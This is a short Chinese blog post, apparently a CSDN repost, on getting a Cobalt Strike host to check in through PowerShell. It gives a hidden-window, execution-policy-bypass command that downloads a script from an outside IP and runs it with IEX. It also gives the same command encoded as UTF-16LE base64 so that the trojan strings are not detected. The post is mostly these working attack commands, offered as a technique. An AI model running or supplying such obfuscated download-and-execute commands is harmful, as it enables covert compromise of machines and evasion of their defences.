当前位置:网站首页>powershell cs-UTF-16LE编码上线

powershell cs-UTF-16LE编码上线

2022-07-07 09:59:00 kuxing_admin

0x01前言

当我们要上线主机的时候,可能会因为你的代码含有木马字符串,导致无法上线

0x02问题


1、 例子
powershell.exe -exec bypass -encodedCommand ZQBjAGgAbwAgACIAMQAyADMAIgA=

在这里插入图片描述

2、原句子
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.0.103:80/a'))"

3、UTF-16LE编码后 (在powershell上能直接执行)
powershell.exe -w hidden -exec bypass -encodedCommand SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMAAuADEAMAAzADoAOAAwAC8AYQAnACkAKQA=
在这里插入图片描述
主机上线
在这里插入图片描述

原网站

版权声明
本文为[kuxing_admin]所创,转载请带上原文链接,感谢
https://blog.csdn.net/weixin_42109829/article/details/125611227